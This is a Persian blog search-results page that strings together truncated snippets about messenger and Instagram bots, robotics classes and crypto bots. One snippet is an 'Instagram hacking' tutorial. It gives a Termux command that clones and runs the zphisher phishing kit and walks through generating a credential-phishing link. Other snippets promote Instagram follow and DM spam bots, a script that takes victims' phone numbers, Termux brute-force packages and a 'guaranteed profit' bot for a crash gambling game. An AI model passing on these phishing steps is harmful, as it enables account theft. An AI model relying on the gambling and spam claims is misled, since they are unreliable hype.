نتایج جستجو برای عبارت :

ساخت ربات روبیکا با ترموکس

اموزش ساخت ربات پیام رسان شخصی بدون هزینه
    با استفاده از این اموزش شما میتوانید ربات پیام رسان خود را بسازید. مزایا: 1- افراد ریپورت می توانند با شما در تماس باشند. 2- ربات کاملا شخصی می باشد 3- سورسی که در این اموزش به شما داده می شود کاملا دیباگ شده و سالم می باشد و قابلیت نشان دادن تعداد کاربران و. را دارد    لازم به ذکر است در این اموزش هیچ هزینه ای برای خرید سرور و دامنه پرداخت نمی کنید. روش کاملا جدید است و با روش های پخش شده در سطح اینترن
با سلام خدمت شما دوستان عزیز سینا کوکائین هستم 
با اموزش هک اینستاگرام از طریق سایت همراهتون هستم
 
کد های زیر را در ترموکس اجرا کنید
apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh
بعد از این کد صفحه ای باز میشه و عدد کنار متن instagram را وارد کنید و اینتر را بزنید
 
بعد عدد2بزنید و اینتر بزنید
سپس عدد 3و اینتر بزنید
 
یک لینک سایت به شما میده کپی میکنید و وارد برنامه کروم میشید
و اون ل
کلاس ربات فوتبالیست در 10 جلسه برگزار می گردد که پک ربات فوتبالیست از انواع قطعات رباتیک تشکیل شده است.در ترم یک علاوه بر ساخت ربات فوتبالیست، ربات تله کابین نیز ساخته می شود که هنرجویان با نحوه کار کردن موتور و سایر قطعات آشنا می شوند.
در پایان ترم یک و پس از ساخت ربات فوتبالیست مسابقات ربات برگزار می گردد که هنرجویان با یکدیگر به رقابت می پردازند.همچنین مسابقات ربات فوتبالیست در سطح استان نیز برگزار می گردد و فایل آموزش ساخت ربات فوتبالیست
ارسال پست به صورت تکی و گروهی آن هم به صورت زماندار یکی از ویژگی هایی است که یک ربات خوب و هوشمند دارد. در یک ربات هوشمند شب و روز معنایی ندارد و همیشه آماده خدمت رسانی میباشد. در ربات مد نظر خود حتما این قابلیت وجود داشته باشد.
بعضی از ربات ها مانند ربات اینستاداب پا را فراتر گذاشته و شما را از ارسال پست بی نیاز میکند. ربات هوشمندی مثل اینستاداب پست هایی را که بیشترین لایک وکامنت دارند را شناسایی میکند و آنها را دانلود کرده و سپس از آن ویدیوها
در واقع ربات اینستاگرام مانند کارمندی هست که شما او را استخدام کرده اید تا پیج اینستاگرام شما را اداره کند. وضایفی که این ربات میتواند انجام دهد متغیر است و از فالوکردن دیگران گرفته تا کامنت گذاشتن و در دایرکت پیام فرستادن را میتواند انجام دهد.
با استفاده از ربات شما با دیگر کاربران ارتباط میسازید بدون آکه طرف بفهمد که با ربات حرف میزند و این یعنی اینکه شما فردی در اختیار دارید که 24 ساعته برای پیشرفت شما تلاش میکند.
لینک دانلود این اسکریپت در نوشته زیر قرار دارد 
لینک دانلود اول = http://anyvm.ihweb.ir/upload/bots.zip
لینک دوم = https://bayanbox.ir/download/5234963459396284150/bots.zip
نحوه کار (اندروید)
1- نرم افزار ترموکس را دانلود کنید
2- دستورر را بزنید pkg install python
3-فایل را انزیپ کرده و فایل numbers.txt را بازکنید
4- شمارت تلفن مورد نظر را وارد کنید (حداکثر میتوانید 5 شماره ثبت کنید)
ادامه مطلب
 
 
سلام به همه شمایی که دارید این مطلب رو می خوانید من  عرفان دهستانی (wild bear)  هستم . حتما این سوال برای شما پیش اومده که چطور میشه با موبایل یک عملیات هک انجام داد . یا اینکه توی فیلم ها و بازی های هکری دید که فرد هکر توی موبایلش برنامه ای داره که شبیه به ترمینال لینوکس داره (منظورم یک صفحه سیاه کامند لاینی است) . اسم اون برنامه ترموکس است و توی این مطلب می خوام به شما یاد بدم که ترموکس چیست , چه کار هایی میشه باهاش کرد و چطور میشه نصبش کرد .
 
برای
ربات تریدر اکو اسمارت – Eco smart Trader Bot نرم افزاری است که خرید و فروش ارزهای دیجیتال مانند بیت کوین را انجام می‌دهد. این ربات به صرافی های رمز ارز مانند بایننس متصل می شود. ربات تریدر اکو اسمارت یک نرم‌افزار کامپیوتری است که به صورت خودکار معاملاتی را انجام می‌دهد. این ربات بر اساس برنامه‌ای که از قبل طرح‌ریزی شده، معاملات را انجام خواهد داد. یک Trading Bot اطلاعات مورد نیاز خود را از صرافی‌ها و از طریق API دریافت می‌کند. ربات معامله گر در همه بازا
به‌جای درگیر کردن ذهن، تلف کردن وقت و انجام دستی معاملات، از ربات‌های تریدر اکو اسمارت استفاده کنید تا زمانی که خواب هستید، شما را ثروتمند کنند؛ ایده فوق‌العاده‌ای به نظر می‌رسد، اما آیا با یک ربات تریدر اکو اسمارت واقعاً می‌توان ثروتمند شد؟ پس از مطالعه این مطلب، با ربات تریدر اکو اسمارت و نحوه کار آن آشنا می‌شوید. همچنین به پاسخ این سوال که آیا سودددهی با ربات معامله‌گر اکو اسمارت قطعی است یا خیر، می‌رسید.
ادامه مطلب
شرکت کره‌ای Hankook Mirae به تازگی یک ربات بسیار بزرگ شبیه به ربات‌هایی که در فیلم آواتار» (Avatar) دیده بودیم ساخته است. این ربات‌ نزدیک به چهار متر ارتفاع و ۱٫۳ تن هم وزن دارد. این ربات به شکلی طراحی شده که یک راننده‌ی مخصوص می‌تواند داخل آن قرار بگیرد و ربات را کنترل کند. البته این ربات هنوز در مرحله‌ی آزمایشی قرار دارد و بعید به نظر می‌رسد که به این زودی‌ها بتوان از آن استفاده کرد؛ اما در کل وسیله‌ی جدیدی خواهد بود که می‌تواند در آینده جنگ ر
یک شرکت دانش بنیان موفق به طراحی و ساخت ربات پرستاری شده که می تواند کمترین ارتباط بین پرستار و بیمار را در بخش‌های عفونی که ناقل بیماری هستند، مورد استفاده قرار بگیرد.
علی قره‌خانی مدیر فنی یک شرکت دانش‌بنیان در گفتگویی با بیان اینکه در این شرکت به ساخت انواع ربات‌ها مشغول هستیم، گفت: با توجه به وضعیت کنونی و شیوع ویروس کرونا در صدد برآمدیم تا رباتی را برای بیمارستان‌ها طراحی کنیم که کمتر نیاز به حضور پرستار در بخش‌ها باشد.
وی با بیان ا
با سلام خدمت دوستان , میدونم این نمونه پست زیاد وجود داره اما بنده بر طبق انتشارات میخوام پیش برم پس در اولین قدم باید به مخاطب یاد بدم چطور یک ربات بسازه.
برای ساخت ربات ابتدا به @botfather برید .
بعد از استارت کردن ربات دستور /newbot رو ارسال کنید
 
بعد از دیدن متن در عکس بالا یک متن برای عنوان رباتتون ارسال کنید.
ادامه مطلب
 فالو کردن دیگران یکی از راه هایی است که به افزایش مخاطبان پیج شما کمک میکند پس ربات شما باید بتواند به طور خودکار افرادی را پیدا کند و آنها  را دنبال کند با این کار کاربران یکبار هم که شده از پیج شما دیدن میکنند. اما آیا فقط دیده شدن کافیست ؟
باید بگویم که خیر. پس ربات شما باید به طور هوشمند این کار را انجام دهد. مثلا شما یک پیج ورزشی داریم اگر ربات فردی را فالو کند و او از پیج شما دیدن کند و اتفاقا اهل ورزش باشد و مطالب شما را ببیند و از آنها خوش
همانطور که مطلع هستید پیام رسان تلگرام دارای ربات های ارزشمندی است که به زبان های مختلفی همچون جاوا نوشته شده اند و کاربردهای مختلفی را برای کاربرهایشان برآورده می کنند. این بار با معرفی یک ربات مفید در زمینه یادآوری امور روزمره و برنامه ریزی فردی در خدمت شما هستیم. در ادامه مطلب با ما همراه باشید.
ادامه مطلب
آموزش الکترونیک مقدماتی شامل قطعه شناسی و ساختن مدارهای الکتریکی می باشد که در ساخت انواع ربات شما نیاز به الکترونیک دارید و با شناخت قطعات الکترونیکی و همچنین آشنایی با بستن انواع مدارهای الکتریکی می توانید ربات را به حرکت در آورید.
قسمت مکانیک ربات به تنهایی کاری را پیش نمی برد و برای اینکه یک ربات ساخته شود نیاز به الکترونیک نیز دارید.در آموزش الکترونیک مقدماتی کاربرد هر قطعه را نیز فرا می گیرید و با قطعاتی همچون برد برد آشنا می شود.
برا
بهترین ربات چت تلگرام با بیش از 7 میلیون کاربر از سراسر ایران
با بگومگو ، افراد #نزدیک خودتو پیداکن و به صورت #ناشناش باهاشون چت کن
 ورود به ربات چت بگومگو
 
ویژگی های ربات بگومگو:
انتخاب چت از بین دختر یا پسر
انتخاب مخاطب از بین شهرهای مختلف
چت با افراد نزدیک
ارسال پیام دایرکت به کاربران
مشاهده پروفایل مخاطبان
امکان ساخت لیست مخاطبین
سرعت بالا
جستجوی پیشرفته
امکان لایک کردن پروفایل کاربران
و خیلی خیلی بیشتر
برای ورود به ربات بگو مگو کلیک ک
با استفاده از این ربات کسایی که درمنطقه ، محله و شهرتون تلگرام دارند رو پیدا کنی و به شکل ناشناس باهاشون چت کنییکی از قابلیت های منحصر به فرد در سرویس ما اینه که میتوانید در منطقه ، شهر و حتی محله دلخواهتون سرچ و دوستیابی کنید !مثلا اگه تو تهرانید ، میتونید تو منطقه نیاوران با استفاده از GPS سرچ کنید و دوستای لاکچری پیدا کنید.
 
ربات چت و گراممزایاانتخاب چت از بین دختر یا پسرچت با هم استانی هاچت با هم سن هاچت با افراد نزدیکامکان ساخت پروفایل و م
Termux چیست؟
ترموکس یک شبیه ساز لینوکسی است که محیط ترمینال این سیستم عامل را شبیه سازی می کند. محیط کاربری این اپلیکیشن فاقد هرگونه ابزار گرافیکی بوده و تمامی دستورات در این برنامه به صورت نوشتاری می باشد.ترموکس دارای ویژگی های بسیاری است که یکی از این ویژگی ها، امکان اجرای پکیج های مخصوص حمله های بروت فورس و سایر حملات به سیستم های شبکه می باشد که می تواند برای علاقه مندان به مباحث هک و امنیت بسیار جذاب باشد. و آموزش یکی از این ویژگی های خوب ر
پیدا کردن افراد نزدیک در تلگرام ممکن شدبا گپ و گرام، افراد #نزدیک خودتو پیداکن و به صورت #ناشناش باهاشون چت کن#رایگان ، تایید شده و کاملا امن 
 ورود به ربات چت بگومگو
 
ویژگی های ربات بگومگو:
انتخاب چت از بین دختر یا پسر
انتخاب مخاطب از بین شهرهای مختلف
چت با افراد نزدیک
ارسال پیام دایرکت به کاربران
مشاهده پروفایل مخاطبان
امکان ساخت لیست مخاطبین
سرعت بالا
جستجوی پیشرفته
امکان لایک کردن پروفایل کاربران
بازگشت سکه چت های ناموفق به حساب شما
و
با سلام و عرض ادب
آن عزیزانی که دنبال ربات ارسال محصول فایل سل و ربات فورکیا می گرددند . می توانند در صورت نیاز با پشتیبانی خرید نیاز هاشون را در ارتباط و تماس بر قرار کنند .
همان طور ک می دانید برنامه ربات ارسال فایل یکی از محبوب ترین برنامه ها در این زمانه می باشد 
جهت تماس با ما 
با ای دی زیر در ارتباط باشید
@PoshtibanMarjafile 
برای خرید با سایت زیر یا حتما با پشتیبانی تلگرام خریدما در ارتباط باشید  
ایده ساز- ایده آوران
برای مدیریت گروههای تلگرامی حتما میبایست از یک ربات مراقب استفاده کنید، ما میخواهیم یک ربات بسیار کارامد با سرعت بسیار بالا و قدرتمند معرفی کنیم که به راحتی گروه تلگرام خود را مدیریت کنید. حتما تا به حال اسپمرهای زیادی در گپ و چت روم تلگرامی شما باعث آزار و اذیت شده اند؛ خیلی راحت می توانید با نصب ربات از شرشان خلاص شوید، پس با ما همراه باشید.
 
امکانات ربات مدیریت گروه
شما دوستان عزیز میتوانید با مراجعه به لینکی که در اختیارتون قرار میدهیم
دریافتعنوان: سورس ربات تغییر نام به بان phpحجم: 2.44 کیلوبایتتوضیحات: سورس ربات تغییر نام به زبان برنامه تویسی php بزودی اموزش های php در وبلاگ قرار خواهد گرفت
نمونه بات تغییر نام نوا تیم @novatmrename_bot
برای دریافت فایل بر روی دریافت در اول سطر کلیک کنید
یکی از بهترین ربات های کامنت گذار که  امکان کامنت گذاشتن در کانال تلگرام را فراهم کنید ربات DiscussBot@ می باشد 
عملکرد ربات بدین صورت است که ابتدا باید ربات را در کانال خود ادمین کنید بعد از اینکار شما هر وقت پست جدید در کانال بفرستید به طور خودکار ربات دکمه شیشه ای در پایین هر پست اضافه میکند که با کلیک بروی آن به سایت متصل میشوید و در آنجا میتوانید کامنت را بارگزاری کنید یا به کامنت دیگران پاسخ دهید.
آموزش ربات کامنت تلگرام
برای شروع ابتدا
حتما از ربات مناسب اینستاگرام استفاده کنید زیرا اگر از scammy استفاده کنید ، از اینستاگرام ممنوع می شوید. خیلی خطرناک است
باید از ایجاد مشکل برای حساب شما جلوگیری کند. به عنوان مثال ، باید از قوانین محدودیت اینستاگرام پیروی کند.
رتبه سایت سایت خود را بررسی کنید تا دریابید که آنها محبوب هستند یا نه.
باید قیمت مناسب داشته باشد. ربات های آزاد بیش از حد ی هستند و به آنها اعتماد نمی شود.
کار با آن آسان است. یک فضای کاری ساده که می توانید کام
با روی کار آمدن روبيکا میلیونها ایرانی به اپلیکیشن محبوب آمدن و عضو شدن و روبيکا هم به پاس این موضوع اقدام به راه اندازی گروه و کانال همانند اپلیکیشن تلگرام کرد.
خیلی از افراد کانال خود را در روبيکا ایجاد کردند و بعضی دیگر نیز در حال راه اندازی کانال روبيکا خود هستند، پس شما هم همین الان کانال روبيکای خودتون رو ایجاد کنید.
بعد از ایجاد کانال روبيکا میتونید کانال خودتون رو در لینکدونی روبيکا تبلیغ کنید تا افزایش ممبر روبيکا داشته باشید و همچ
ارسال پیام در دایرکت موجب ارتباط شما با افراد مختلف میشود. اگر شما بتوانید افراد هدف خود را پیدا کنید و برای آنها در دایرکت پیام بفرستید که آنها را به خود جذب کنید قطعا روزانه شاهد فالورهای جدیدی خواهید بود. اما پیدا کردن افراد مناسب و ارسال پیام روزانه خیلی زمان بر است.
اما این محدودیت برای ربات هوشمند اینستاگرامی، کار سختی نمیباشد. یک ربات هوشمند میتواند به هر تعداد افراد که شما بخواهید پیام بفرستد.
پکیج ربات بازی انفجار؟ با این ربات فقط سود کنید!!!!
باور نمیکنی؟ رایگان دانلود کن!!!! تمام پکیج رو!!!! ما از شما پول نمیگیریم!!!!
ترفندهای بازی انفجار!!!
تمام آن چیزی که برای برد نیاز دارید!
با راهکارهای مخصوص هر سایت!
تماما رایگان در اختیار شما!
توضیحات نصب ربات انفجار روی مروگر!
به صورت ویدیو از 0 تا 100.
کاملا رایگان!!
ربات تشخیص ضریب بازی انفجار
ربات خودکار بازی انفجار و بدون نیاز به مراقبت!!!!
 
 
بهترین سایت که ربات بازی انفجار بر روی ان تست شده و در
ثبت
نام ترم اول رباتیک ، دوره جدید مرداد ماه ، رو از دست ندین ( ظرفیت محدود
) ⁦✔️⁩ برای ما کلاس های رباتیک فقط آموزش خالص رباتیک نیست بلکه ایجاد
ارتباط قوی با بچه ها و خانوادهاست !.تشکیل گروه تلگرامی برای ارتباط بیشتر والدینارسال فیلم های آموزشی هر جلسه برای تمرین بیشترارسال تمرینات هفتگی برای آمادگی بیشتر بچه هاتشویق به کار گروهی و ایجاد ارتباط اجتماعی ثبت خاطرات خوش و زیبای تابستان➖➖➖➖➖➖➖➖➖هزینه ترم اول :هزینه آموزش برای ۸ الی ۱۰
ارتباط ربات تلگرام با نرم افزار crm
 
ربات تلگرام به عنوان یکی از شبکه های اجتماعی پرطرفدار در ایران با نرم افزار crm لینک شده است با لینک نرم افزار crm به ربات تلگرام می توان هر نوع اطلاعات را بین دو نرم افزار جا به جا کرد :
ربات تلگرام فروشگاه اینترنتی متصل به crm
ربات تلگرام نظرسنجی متصل به crm
ربات تلگرام خدمات پس از فروش متصل به crm
ربات تلگرام مطالعه بازار متصل به crm
ربات تلگرام سفارشات متصل به crm
ربات تلگرام موجودی گیری انبار متصل به crm
ربات تلگرا
دارکوین
 
با سلام و وقت بخیر خدمت کاربران و بازدید کنندگان عزیز.
امروز میخوام یه ارز دیجیتالی رو بهتون معرفی کنم که به راحتی و از طریق ربات تلگرام قابل استخراجه.
نام این ارز دار کوین هستش.
 
توضیحات ویکی پدیا در رابطه با دار کوین :
https://fa.wikipedia.org/wiki/%D8%AF%D8%A7%D8%B1_%DA%A9%D9%88%DB%8C%D9%86
 
خوب اول از همه بگم قیمت این ارز در حال حاضره 1 دلاره به قیمت امروز دلار حدودا 14 هزار تومان.
به راحتی میتونید استخراجش کنید با استفاده از ربات تلگرام و به خود ربات تلگرام بفرو

آخرین مطالب

آخرین جستجو ها

او می آید... مشق مدارا * ما تا آخر ایستاده ایم * اجاره ویلا و سوییت در قشم ویژه مسافرین گرامی اخذ مشاوره و صدور گواهینامه ایزو استودیو پیراشکی |برنامه نویسی اندروید|ساخت سایت|برنامه نویسی وب|قالب وردپرس فرهنگ خاوری ها دانلود رایگان نمونه سوالات سنگ کاری درجه 3 سئو کارشو ♻️✔نرم افزار کامپیوتر✔♻️